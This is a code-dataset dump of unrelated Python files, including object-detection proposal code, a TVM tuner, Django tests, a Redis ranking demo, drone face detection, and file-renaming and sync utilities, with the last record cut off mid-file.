bbox_transform中的bbox_transform_inv_tf函数。\n \"\"\"\n rpn_bbox_pred = tf.reshape(rpn_bbox_pred, shape=(-1, 4))\n\n \"\"\"\n 这里的anchors即为feature map中像素点映射回原始图生成的所有anchors boxes的坐标,shape同rpn_bbox_pred,这里假设,anchors如下:\n array([[ 0, 0, 2, 2],\n [ 4, 4, 6, 6],\n [ 8, 8, 10, 10],\n [12, 12, 14, 14],\n [16, 16, 18, 18],\n [20, 20, 22, 22],\n [24, 24, 26, 26],\n [28, 28, 30, 30]])\n shape同样为(8, 4),每一行代表一个原始anchor的坐标描述。\n 通过计算,predict boxes的坐标如下:\n array([[ 0., 0., 3., 3.],\n [ 4., 4., 7., 7.],\n [ 8., 8., 11., 11.],\n [12., 12., 15., 15.],\n [16., 16., 19., 19.],\n [20., 20., 23., 23.],\n [24., 24., 27., 27.],\n [28., 28., 31., 31.]])\n shape为(8, 4),本来设置偏移量为0的,为何算出来的predict boxes和anchor boxes有点不一样呢? 通过分析发现bbox_transform_inv_tf中的\n 计算中心坐标过程有点问题。但是可能影响比较小吧。\n \"\"\"\n proposals = bbox_transform_inv_tf(anchors, rpn_bbox_pred)\n\n \"\"\"\n 通过分析minibatch.py可得im_info由三个数组成,分别为高,宽和缩放比例。\n 上边得到了predict boxes的坐标描述,但是为了限制在图片内,所以需要把坐标跟宽高进行比较。\n 使得x坐标满足:\n 0<= x <= w\n 使得y坐标满足:\n 0<= y <= h\n \"\"\"\n proposals = clip_boxes_tf(proposals, im_info[:2])\n\n \"\"\"\n Non-maximal suppression\n 通过非极大抑制算法减少一些重叠度比较大的predict boxes,关于非极大抑制算法见lib/nms/的readme。\n \"\"\"\n indices = tf.image.non_max_suppression(proposals, scores, max_output_size=post_nms_topN, iou_threshold=nms_thresh)\n\n \"\"\"\n 根据非极大抑制算法算出来的需要保留的predict boxes indices缩减一下proposals和scores。\n \"\"\"\n boxes = tf.gather(proposals, indices)\n boxes = tf.to_float(boxes)\n scores = tf.gather(scores, indices)\n scores = tf.reshape(scores, shape=(-1, 1))\n\n \"\"\"\n Only support single image as input\n 在predict boxes前加一列0?接着下面分析看前面一列0的用途。\n \"\"\"\n batch_inds = tf.zeros((tf.shape(indices)[0], 1), dtype=tf.float32)\n blob = tf.concat([batch_inds, boxes], 1)\n\n return blob, scores\n\n\n","sub_path":"lib/layer_utils/proposal_layer.py","file_name":"proposal_layer.py","file_ext":"py","file_size_in_byte":5764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"633535725","text":"import autotvm\nimport random\nimport numpy as np\nimport logging\nfrom autotvm.tuner.tuner import Tuner\n\nclass SATuner(Tuner):\n def __init__(self, task, pool, total, shrink=0.9, T=None, target=None):\n super(SATuner, self).__init__(task)\n\n self.space = task.config_space\n self.pool_size = pool\n self.total = total\n self.shrink = shrink\n\n vals = self.space.space_map.values()\n\n self.dims = [len(i) for i in vals] + [1]\n self.n_dims = len(vals)\n if T is None:\n self.originT = self.T = np.sqrt(sum(i * i for i in self.dims)) / pool\n else:\n self.originT = self.T = T\n self.N = reduce(int.__mul__, self.dims)\n\n self.visited = set([])\n\n self.pool = []\n self.exec_pool = []\n for i in range(pool):\n temp = random.randint(0, self.N - 1)\n while temp in self.visited:\n temp = random.randint(0, self.N - 1)\n self.pool.append((temp, 0))\n self.exec_pool.append(temp)\n self.visited.add(temp)\n\n vec = self._i_to_vec(temp)\n #print temp\n #print vec\n #print self._vec_to_i(vec)\n\n self.cur = 0\n self.better = False\n\n\n def next_batch(self, batch_size):\n res = []\n for i in range(self.cur, min(self.pool_size, self.cur + batch_size)):\n res.append(self.space.get(self.exec_pool[i]))\n self.cur += 1\n return res\n\n def has_next(self):\n return len(self.visited) - (self.pool_size - self.cur) < self.total and self.T > 1.0\n\n def update(self, inputs, results):\n n = len(inputs)\n assert n == len(results)\n for i in range(self.cur - n, self.cur):\n _i = i - self.cur + n\n inp = inputs[_i]\n res = results[_i]\n sol, old_score = self.pool[i]\n if res.error_no == 0:\n new_score = inp.task.flop / np.mean(res.costs) / 2.5e12\n else:\n new_score = 0.0\n if new_score > old_score:\n logging.log(logging.INFO, '%f is better than %f' % (new_score, old_score))\n self.pool[i] = (self.exec_pool[i], new_score)\n self.better = True\n elif random.random() < np.exp(-(old_score - new_score) * self.originT / self.T):\n per = np.exp(-(old_score - new_score) * self.originT / self.T)\n logging.log(logging.INFO, '%.2f%% accept a bad score %f (%f)' % (per * 100.0, new_score, old_score))\n self.pool[i] = (self.exec_pool[i], new_score)\n\n if self.cur >= self.pool_size:\n if self.better:\n self.T *= self.shrink\n logging.log(logging.INFO, 'Current Temperature: %f' % self.T)\n self.better = False\n\n self.cur = 0\n for i in range(self.pool_size):\n sol, _ = self.pool[i]\n\n def _explore(sol):\n vec = self._i_to_vec(sol)\n T = self.T\n for j in range(self.n_dims - 1):\n angle = (random.random() * np.pi * 2)\n vec[j] = (vec[j] + int(self.T * np.cos(angle))) % self.dims[j]\n T *= np.sin(angle)\n vec[-1] = (vec[-1] + int(T)) % self.dims[-1]\n return self._vec_to_i(vec)\n\n temp = _explore(sol)\n while temp in self.visited:\n temp = _explore(temp)\n self.exec_pool[i] = temp\n self.visited.add(temp)\n \n\n def _i_to_vec(self, num):\n res = []\n for i in range(self.n_dims, 0, -1):\n res.append(num % self.dims[i])\n num /= self.dims[i]\n res.reverse()\n return res\n\n def _vec_to_i(self, vec):\n res = 0\n for i in range(1, self.n_dims):\n res = res * self.dims[i] + vec[i-1]\n return res\n\n","sub_path":"tvm-auto/sa.py","file_name":"sa.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"429884664","text":"#!/usr/bin/env python\n\"\"\"\nFinds \"all\" the peaks in an image.\n\nHazen 01/14\n\"\"\"\nimport numpy\n\nimport storm_analysis.sa_library.analysis_io as analysisIO\nimport storm_analysis.sa_library.fitting as fitting\nimport storm_analysis.sa_library.dao_fit_c as daoFitC\n\ndef initFindAndFit(parameters):\n \"\"\"\n Return the appropriate type of finder and fitter.\n \"\"\"\n fmodel = parameters.getAttr(\"model\")\n \n # Create peak finder.\n finder = fitting.PeakFinderGaussian(parameters = parameters)\n\n # Initialize Z fitting parameters.\n wx_params = None\n wy_params = None\n min_z = None\n max_z = None\n if (parameters.getAttr(\"model\", \"na\") == \"Z\"):\n [wx_params, wy_params] = parameters.getWidthParams(for_mu_Zfit = True)\n [min_z, max_z] = parameters.getZRange()\n\n # Check for camera calibration (this function is also used by sCMOS analysis).\n variance = None\n if parameters.hasAttr(\"camera_calibration\"):\n \n # Load variance, scale by gain.\n #\n # Variance is in units of ADU*ADU.\n # Gain is ADU/photo-electron.\n #\n [offset, variance, gain] = analysisIO.loadCMOSCalibration(parameters.getAttr(\"camera_calibration\"))\n variance = variance/(gain*gain)\n\n # Set variance in the peak finder, this method also pads the\n # variance to the correct size.\n variance = finder.setVariance(variance)\n \n # Create C fitter object.\n fitters = {'2dfixed' : daoFitC.MultiFitter2DFixed,\n '2d' : daoFitC.MultiFitter2D,\n '3d' : daoFitC.MultiFitter3D,\n 'Z' : daoFitC.MultiFitterZ}\n mfitter = fitters[fmodel](roi_size = finder.getROISize(),\n scmos_cal = variance,\n wx_params = wx_params,\n wy_params = wy_params,\n min_z = min_z,\n max_z = max_z)\n\n # Create peak fitter.\n fitter = fitting.PeakFitter(mfitter = mfitter,\n parameters = parameters)\n\n # Specify which properties we want from the analysis.\n properties = [\"background\", \"error\", \"height\", \"iterations\", \"significance\", \"sum\", \"x\", \"y\"]\n if (fmodel == \"2dfixed\") or (fmodel == \"2d\"):\n properties.append(\"xsigma\")\n elif (fmodel == \"3d\"):\n properties.append(\"xsigma\")\n properties.append(\"ysigma\")\n elif (fmodel == \"Z\"):\n properties.append(\"xsigma\")\n properties.append(\"ysigma\")\n properties.append(\"z\")\n\n return fitting.PeakFinderFitter(peak_finder = finder,\n peak_fitter = fitter,\n properties = properties)\n\n#\n# The MIT License\n#\n# Copyright (c) 2016 Zhuang Lab, Harvard University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n","sub_path":"storm_analysis/daostorm_3d/find_peaks.py","file_name":"find_peaks.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"491951893","text":"# @author Danja Verburg\n# Start een socket en thread die verbonden wordt met vmix via TCP. Er wordt een bericht gestuurd naar Vmix\n# en de response wordt verwerkt in een GET request van app.py\n\nimport socket\nfrom socket import error as socket_error\nimport threading\nimport requests\n\nTCP_IP = '127.0.0.1'\nTCP_PORT = 8099\nMSG_SIZE = 1024\napi_url = 'http://127.0.0.1:5000'\n\n# Maakt TCP/IP socket aan\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocket.connect((TCP_IP, TCP_PORT))\n\n\ndef get_data(socket):\n while True:\n try:\n data = socket.recv(MSG_SIZE)\n data = str(data)\n antwoord = data.split(' ')\n tallyIndex(antwoord[2])\n\n if not data:\n break\n except socket_error as e:\n print(e)\n break\n\n\n# Maakt thread aan voor socket connectie\niThread = threading.Thread(target=get_data, args=(socket,))\niThread.start()\nprint(\"Connected...\")\n\n\ndef tallyIndex(response):\n try:\n # checkt hoeveel tally lights zijn aangesloten en stuurt dit door naar app.py\n tallyAAN = api_url + '/tallyAAN={}'.format(response)\n print(tallyAAN.split(\"\\\\\")[0])\n switch = requests.get(tallyAAN)\n # Checkt welke tally light live is en stuurt dit door naar app.py\n for i in range(len(response)):\n if response.index(\"1\") == i:\n url = api_url + '/tally={}'.format(i)\n tally = requests.get(url)\n print(i)\n\n except Exception as e:\n print(e)\n finally:\n print(response)\n return response\n\n\nsocket.send(bytes(\"SUBSCRIBE TALLY\\r\\n\", encoding='utf8'))\n","sub_path":"VmixConnectie&GUI/VmixTallyLight.py","file_name":"VmixTallyLight.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"241242171","text":"import redis\n\nr = redis.Redis()\n\n# 有序集合中添加了8首歌曲\nr.zadd('ranking', {'song1': 1, 'song2': 1, 'song3': 1, 'song4': 1})\nr.zadd('ranking', {'song5': 1, 'song6': 1, 'song7': 1, 'song8': 1})\n# 指定成员增加分值\nr.zincrby('ranking', 50, 'song3')\nr.zincrby('ranking', 60, 'song4')\nr.zincrby('ranking', 70, 'song8')\n# 获取前3名: [('song8',71),(),()]\n\n#\nrank_list = r.zrevrange('mobile:001-003', 0, 2, withscores=True)\n\ni = 1\nfor rank in rank_list:\n print(\"第{}名:{} 销量\".format(i, rank[0].decode(), int(rank[1])))\n i += 1\n","sub_path":"part_04.1_redis/day03/02_mobile.py","file_name":"02_mobile.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"494861166","text":"import cv2\nfrom djitellopy import tello\n\ntello = tello.Tello()\ntello.connect()\nbattery_level = tello.get_battery()\nprint(battery_level)\ntello.streamon()\n\ndef findFace(img):\n faceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(imgGray, 1.2, 8)\n\n myFaceListC = []\n myFaceListArea = []\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x,y), (x+w, y+h), (0,0,255), 2)\n cx = x + w // 2\n cy = y + h // 2\n area = w * h\n cv2.circle(img, (cx, cy),10,(0,255,0), 6)\n myFaceListC.append([cx,cy])\n myFaceListArea.append(area)\n # print(myFaceListC)\n if len(myFaceListArea) != 0:\n i= myFaceListArea.index(max(myFaceListArea))\n return img, [myFaceListC[i],myFaceListArea[i]]\n else:\n return img, [[0,0],0]\n\nwhile True:\n img = tello.get_frame_read().frame\n img = cv2.resize(img, (360, 240))\n\n img, info = findFace(img)\n cv2.imshow('frame',img)\n if cv2.waitKey(5) & 0xFF == ord('q'):\n break\n\n# Release everything if job is finished\n# cap.release()\n# out.release()\ncv2.destroyAllWindows()\n","sub_path":"Day04/findFaceTello02.py","file_name":"findFaceTello02.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"213677221","text":"import re \r\ndef first(text): #создаем функцию для первого задания\r\n print(\"дан текст: \", text) \r\n reg = re.compile('[^а-яА-Я ][^a-zA-Z ]')\r\n text1 = reg.sub('', text)\r\n #text.replace('.')\r\n print(text1)\r\n Broke=text1.split() #разбиваем текст на список слов\r\n k=len(Broke) #длина списка\r\n list_three=[] # создаем список\r\n for i in range(k):\r\n if len(Broke[i])==3: \r\n list_three.append(Broke[i]) # добавляем в новый список все слова с 3-мя буквами\r\n print(\"слова содержащие 3 буквы: \",\" \".join(list_three)) #выводим на экран\r\nfirst(input(str(\"введите текст: \"))) #обращаемся к первому заданию\r\n\r\ndef second(text_a): #функция для второго задания\r\n print(\"дан текст: \", text_a)\r\n reg = re.compile('[^a-zA-Z ][^а-яА-Я ]')\r\n text_a = reg.sub('', text_a)\r\n words = text_a.split()#разбиваем предложение на список слов\r\n new = [] #создаем новый список\r\n for i in range(len(words)): #цикл до длины списка\r\n word=words[i][::-1] #переворачиваем слово\r\n new.append(word) #перевернутое слово добавляем в новый список\r\n new.append(str('.')) #добавляем удаленный символ\r\n print(\"ответ:\",'\\n', ' '.join(new)) # вывод на экран\r\nsecond(str(input(\"введите зашифрованный текст: \"))) #обращаемся ко второй функции\r\ninput()\r\n","sub_path":"lab3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"523169860","text":"from django.urls import resolve\nfrom django.test import TestCase\nfrom django.http import HttpRequest\nfrom .views import home_page\nfrom django.template.loader import render_to_string\nfrom .models import Item, List\n\n\nclass HomePageTest(TestCase):\n\n def test_root_url_resolves_to_home_page_view(self):\n found = resolve('/')\n self.assertEqual(found.func, home_page)\n\n def test_home_page_returns_correct_html(self):\n request = HttpRequest()\n response = home_page(request)\n expected_html = render_to_string('home.html', request=request)\n # self.assertEqual(response.content.decode('UTF-8'), expected_html)\n # print('response.content.decode()\\n', response.content.decode())\n # print('expected_html\\n', expected_html)\n\n\nclass ListAndItemModelsTest(TestCase):\n\n def test_saving_and_retrieving_items(self):\n list_ = List()\n list_.save()\n\n first_item = Item()\n first_item.text = 'The first (ever) list item'\n first_item.list = list_\n first_item.save()\n\n second_item = Item()\n second_item.text = 'Item the second'\n second_item.list = list_\n second_item.save()\n\n saved_list = List.objects.first()\n self.assertEqual(saved_list, list_)\n\n saved_item = Item.objects.all()\n self.assertEqual(saved_item.count(), 2)\n\n first_saved_item = saved_item[0]\n second_saved_item = saved_item[1]\n\n self.assertEqual(first_saved_item.text, 'The first (ever) list item')\n self.assertEqual(first_saved_item.list, list_)\n self.assertEqual(second_saved_item.text, 'Item the second')\n self.assertEqual(second_saved_item.list, list_)\n\n\nclass ListViewTest(TestCase):\n\n def test_uses_list_template(self):\n list_ = List.objects.create()\n response = self.client.get('/lists/%d/' % (list_.id,))\n self.assertTemplateUsed(response, 'list.html')\n\n def test_display_only_items_for_that_list(self):\n correcrt_list_ = List.objects.create()\n Item.objects.create(text='itemey 1', list=correcrt_list_)\n Item.objects.create(text='itemey 2', list=correcrt_list_)\n\n other_list = List.objects.create()\n Item.objects.create(text='other list item 1', list=other_list)\n Item.objects.create(text='other list item 2', list=other_list)\n\n response = self.client.get('/lists/%d/' % (correcrt_list_.id,))\n\n # request = HttpRequest()\n # response = home_page(request)\n # 以上2句升级为以下一句\n #response = self.client.get('/lists/the-only-list-in-the-world/')\n\n self.assertContains(response, 'itemey 1')\n self.assertContains(response, 'itemey 2')\n self.assertNotContains(response, 'other list item 1')\n self.assertNotContains(response, 'other list item 2')\n\n\nclass NewListTest(TestCase):\n\n def test_can_save_a_POST_request(self):\n self.client.post('/lists/new', data={'item_text': 'A new list item'})\n\n self.assertEqual(Item.objects.count(), 1)\n new_item = Item.objects.first()\n self.assertEqual(new_item.text, 'A new list item')\n\n def test_redirects_after_POST(self):\n response = self.client.post('/lists/new', data={'item_text': 'A new list item'})\n new_list = List.objects.first()\n self.assertRedirects(response, '/lists/%d/' % (new_list.id,))\n\n\nclass NewItemTest(TestCase):\n\n def test_can_save_a_POST_to_an_existing_list(self):\n '''\n 测试为现存list添加Item会被保存下来。\n 1. 建立一个correct_list和一个other_list\n 2. 调用添加Item的POST接口,传入参数\n 3. 断言:Item个数 == 1\n 断言:Item第一个的文本 == POST时传入的参数\n 断言:Item第一个的列表 == correct_list\n :return:\n '''\n other_list = List.objects.create()\n correct_list = List.objects.create()\n response = self.client.post('/lists/%d/add_item' % correct_list.id,\n data={'item_text': 'A new item for an existing list'})\n\n self.assertEqual(Item.objects.count(), 1)\n new_item = Item.objects.first()\n self.assertEqual(new_item.text, 'A new item for an existing list')\n self.assertEqual(new_item.list, correct_list)\n\n def test_redirects_to_list_view(self):\n other_list = List.objects.create()\n correct_list = List.objects.create()\n\n response = self.client.post('/lists/%d/add_item' % correct_list.id,\n data={'item_text': 'A new item for an existing list'})\n\n self.assertRedirects(response, '/lists/%d/' % (correct_list.id,))\n\n def test_passes_correct_list_to_template(self):\n other_list = List.objects.create()\n correct_list = List.objects.create()\n\n response = self.client.get('/lists/%d/' % (correct_list.id,))\n self.assertEqual(response.context['list'], correct_list)\n","sub_path":"lists/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"75045362","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport grab\nfrom TechParser import parser\n\ndef get_articles():\n\tg = grab.Grab()\n\tparser.setup_grab(g)\n\t\n\tg.go('http://planet.clojure.in')\n\t\n\tcss_path = '.entry .article h2 a'\n\t\n\treturn parser.get_articles(g, css_path, css_path,\n\t\t'planetclojure', 'planet.clojure.in')\n","sub_path":"TechParser/planetclojure.py","file_name":"planetclojure.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"486571958","text":"# coding=UTF-8\n\nfrom support.transfer.base import BaseTransfer\nfrom model.store.model_shop import Channel\n\nclass ChannelTransfer(BaseTransfer):\n\n def base_sql(self):\n if not hasattr(self, '_sql_str'):\n self._sql_str = \"select * from ct_sale_channel where grade=0 and create_date between '2018-06-21 00:00:00' \\\n and '2018-06-21 23:59:59'\"\n\n def run(self):\n self.base_sql()\n current = 0\n sql = self.generate_sql(current)\n data_list = self.get_date_list(sql)\n print(\"============\", sql)\n while len(data_list) > 0:\n print(\"============\", len(data_list))\n channel_list = self.generate_date(data_list)\n Channel.objects.bulk_create(channel_list)\n current = current + 1\n sql = self.generate_sql(current)\n data_list = self.get_date_list(sql)\n\n self.break_link()\n print(\"==================成功结束Channel==================\")\n\n def generate_date(self, data_list):\n channel_list = []\n for dic_data in data_list:\n channel_qs = Channel.search(name = dic_data[\"name\"])\n if channel_qs.count() == 0:\n channel_list.append(Channel(name = dic_data[\"name\"], freight = 900, \\\n single_repair_money = int(dic_data[\"remoney\"] * 100) if dic_data[\"remoney\"] else 0, \\\n single_point_money = int(dic_data['bucmoney'] * 100) if dic_data[\"bucmoney\"] else 0, \\\n update_time = dic_data[\"modify_date\"], \\\n create_time = dic_data[\"create_date\"]))\n\n return channel_list\n\n def generate_sql(self, current, limit = 100):\n return \"{s} limit {i},{l}\".format(s = self._sql_str, i = current * limit, l = limit)\n\n","sub_path":"codes/personal_backend/support/transfer/channel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"129794116","text":"import os\n\nfrom settings import PROJECT_ROOT\nfrom mesgclsf.datapreptools import get_immediate_subfolders\n\nif __name__ == \"__main__\":\n ext_filter = ['.jpg', '.png']\n in1_dir = os.path.join(PROJECT_ROOT, 'Data', 'Step1', 'Training', 'Positive')\n in2_dir = os.path.join(PROJECT_ROOT, 'Data', 'Step2', 'Training')\n\n file_list1 = []\n for img_file1 in os.listdir(in1_dir):\n full_path_name1 = os.path.join(in1_dir, img_file1)\n if os.path.isfile(full_path_name1) and img_file1.lower().endswith(tuple(ext_filter)):\n file_list1.append(img_file1)\n\n file_list2 = []\n for sub_dir in get_immediate_subfolders(in2_dir):\n full_dir = os.path.join(in2_dir, sub_dir)\n for sub_dir2 in get_immediate_subfolders(full_dir):\n full_dir2 = os.path.join(full_dir, sub_dir2)\n\n for img_file2 in os.listdir(full_dir2):\n full_path_name2 = os.path.join(full_dir2, img_file2)\n if os.path.isfile(full_path_name2) and img_file2.lower().endswith(tuple(ext_filter)):\n file_list2.append(img_file2)\n\n diff21 = list(set(file_list2) - set(file_list1))\n print(\"Files in step2 and not in step1:\")\n for f21 in diff21:\n print(f21)\n\n diff12 = list(set(file_list1) - set(file_list2))\n print(\"Files in step1 and not in step2:\")\n for f12 in diff12:\n print(f12)","sub_path":"mesgclsf/filelistcomp.py","file_name":"filelistcomp.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"369736445","text":"import os\r\nimport matplotlib.pyplot as plt\r\n\r\ntrain_losses = []\r\nmetrics = {'l2':[], 'l1':[], 'completeness':[], 'median error':[]}\r\n\r\nmodelname = 'mvsnet_large239'\r\nstart_epoch = int(modelname[12:])\r\nmetrics['l2'].append([])\r\nmetrics['l1'].append([])\r\nmetrics['completeness'].append([])\r\nmetrics['median error'].append([])\r\nwith open(os.path.join('debug/end2end_mvsnet_large_pretrain%d_1000/log_test_bak.txt'%start_epoch)) as f:\r\n for line in f:\r\n metrics['l2'][-1].append(float(line.rstrip().split()[-18]))\r\n metrics['l1'][-1].append(float(line.rstrip().split()[-3]))\r\n metrics['completeness'][-1].append(float(line.rstrip().split()[-8]))\r\n metrics['median error'][-1].append(float(line.rstrip().split()[-13]))\r\nwith open(os.path.join('logs', modelname+'.txt')) as f:\r\n for line in f:\r\n if 'average' not in line:\r\n continue\r\n train_losses.append(float(line.rstrip().split()[-1]))\r\n\r\nplt.style.use('bmh')\r\ntrain_epochs = len(train_losses)\r\nmin_epochs = min([len(loss) for loss in metrics['l2']])\r\nn_train_epoch = [i+1 for i in range(train_epochs)]\r\nn_epoch = [i*5+1 for i in range(min_epochs)]\r\nfig, ax1 = plt.subplots(1, 1)\r\nax1.plot(n_train_epoch, train_losses, 'black', label='train')\r\nax1.plot(n_epoch, metrics['l1'][0], linestyle='--', color='black', label='validation')\r\nax1.set_xlabel('number of epochs')\r\nax1.set_ylabel('loss')\r\nax1.legend()\r\nax1.grid(True)\r\nplt.savefig('debug/all_losses.png')","sub_path":"visualize_compare.py","file_name":"visualize_compare.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"635546091","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include(\"dashboard.urls\")),\n path('account/', include(\"account.urls\")),\n path('api/', include(\"api.urls\")),\n]\n\nadmin.site.site_header = \"CHURCH - DATABASE ADMINISTRATOR\"\nadmin.site.index_title = \"TABLES\" \nadmin.site.site_title = 'Super User' \n\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)","sub_path":"church_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"430387216","text":"import os\n\ndef menu():\n\tprint(\"*\"*50)\n\tprint(\" 文件管理系统\")\n\tprint(\"1: 添加\")\n\tprint(\"2:修改\")\n\tprint(\"3:删除\")\n\tprint(\"*\"*50)\nmenu()\nfolder_name = input(\"输入需要操作的文件夹:\")\n\n#根据用户输入新建文件夹\ndef add_file():\n\tnew_name = folder_name\n\tos.mkdir(new_name)\n\tprint(\"已新建文件夹%s\"%new_name)\n\t#新建几个文件\t\n\tcount = 1\n\twhile count <=10:\n\t\tmovie = open(new_name+\"\\\\\"+\"秦时明月-0%d.mp4\"%count,\"wb+\")\n\t\tcount +=1\t\t\t\t\t\t\n\tfile_num = os.listdir(new_name)\n\tprint(\"新建文件为%s\"%file_num)\n\treturn file_num\n\n#根据输入目录修改文件名\ndef rename_file():\n#\tfolder_name = input(\"输入要重命名文件夹:\")\n\t#改变工作目录\n#\tos.chdir(folder_name)\n\t#重命名\n\tfile_num = os.listdir(folder_name)\n\tfor name in file_num:\n\t\t#print(name)\t\n\t\told_file_name = folder_name+'\\\\'+name\n\t\tnew_file_name = folder_name+'\\\\'+\"[玄机出品]-\"+name\n\t\tos.rename(old_file_name,new_file_name)\n\tmovie_name = os.listdir(folder_name)\n\tfor movie in movie_name:\n\t\tprint(\"修改后文件名为:%s\"%movie)\n\treturn folder_name,movie_name\n\ndef rmname_file():\n\trm_name = input(\"输入删除的名称:\")\n\t#删除后缀\n\tfile_num = os.listdir(folder_name)\n\tfor name in file_num:\n#\t\tprint(name)\n\t\tfile_name = folder_name+'\\\\'+name.replace(rm_name,'')\n\t\tprint(\"删除后文件名为:%s\"%file_name)\n\t\tname = folder_name+'\\\\'+name\n\t\tos.rename(name,file_name)\n\nwhile True:\n\tnum=int(input(\"请输入功能序号:\"))\n\n\tif num==1:\n\t\tadd_file()\n\t\tprint(\"已添加文件\")\n\telif num==2:\n\t\trename_file()\n\t\tprint(\"已修改...\")\n\telif num==3:\n\t\trmname_file()\n\t\tprint(\"已删除文件名...\")\n\telse:\n\t\tprint(\"输入有误..\")\n","sub_path":"file/批量重命名.py","file_name":"批量重命名.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534962556","text":"from Node import Node\n\ndef ceilInBST(root, val):\n res = -1\n while root is not None:\n if root.val == val:\n res = root.val\n elif root.val < val:\n root = root.right\n else:\n res = root.val \n root = root.left\n return res\n\nroot = Node(5)\nroot.left = Node(3)\nroot.left.left = Node(2)\nroot.left.right = Node(4)\nroot.right = Node(7)\nroot.right.left = Node(6)\nroot.right.right = Node(9)\n\nitem = int(input('Enter search item: '))\nprint(ceilInBST(root, item))","sub_path":"Binary Search Tree/Ceil in BST.py","file_name":"Ceil in BST.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"625868651","text":"import os\n\nfrom cauldron import cli\nfrom cauldron import environ\nfrom cauldron.cli import sync\nfrom cauldron.environ.response import Response\nfrom cauldron.environ.response import ResponseMessage\n\nNAME = 'sync'\nDESCRIPTION = \"\"\"\n Synchronizes the remote cauldron connection with the most recent versions\n of the locally stored project files.\n \"\"\"\n\n\ndef do_synchronize(\n context: cli.CommandContext,\n source_directory: str,\n newer_than: float\n) -> Response:\n \"\"\" \"\"\"\n\n synchronized = []\n\n def on_progress(message: ResponseMessage):\n if message.kind == 'SKIP':\n return\n\n if len(synchronized) < 1:\n environ.log_header(\n text='SYNCHRONIZING',\n level=2,\n whitespace=1\n )\n\n if message.code == 'STARTED':\n synchronized.append(message)\n\n chunk_count = message.data.get('chunk_count', 0)\n\n if message.code == 'DONE' and chunk_count < 2:\n return\n\n message.console()\n\n sync_response = sync.files.send_all_in(\n directory=source_directory,\n remote_connection=context.remote_connection,\n newer_than=newer_than,\n progress_callback=on_progress\n )\n context.response.consume(sync_response)\n\n context.response.update(synchronized_count=len(synchronized))\n\n if len(synchronized) < 1:\n return context.response\n\n touch_response = sync.comm.send_request(\n endpoint='/sync-touch',\n method='GET',\n remote_connection=context.remote_connection\n )\n context.response.consume(touch_response)\n\n if not context.response.failed:\n environ.log('Synchronization Complete', whitespace=1)\n\n return context.response\n\n\ndef execute(context: cli.CommandContext) -> Response:\n \"\"\" \"\"\"\n\n if not context.remote_connection.active:\n return context.response.fail(\n code='NO_REMOTE_CONNECTION',\n message='No active remote connection is available. Nothing to sync.'\n ).console(\n whitespace=1\n ).response\n\n status_response = sync.comm.send_request(\n endpoint='/sync-status',\n method='GET',\n 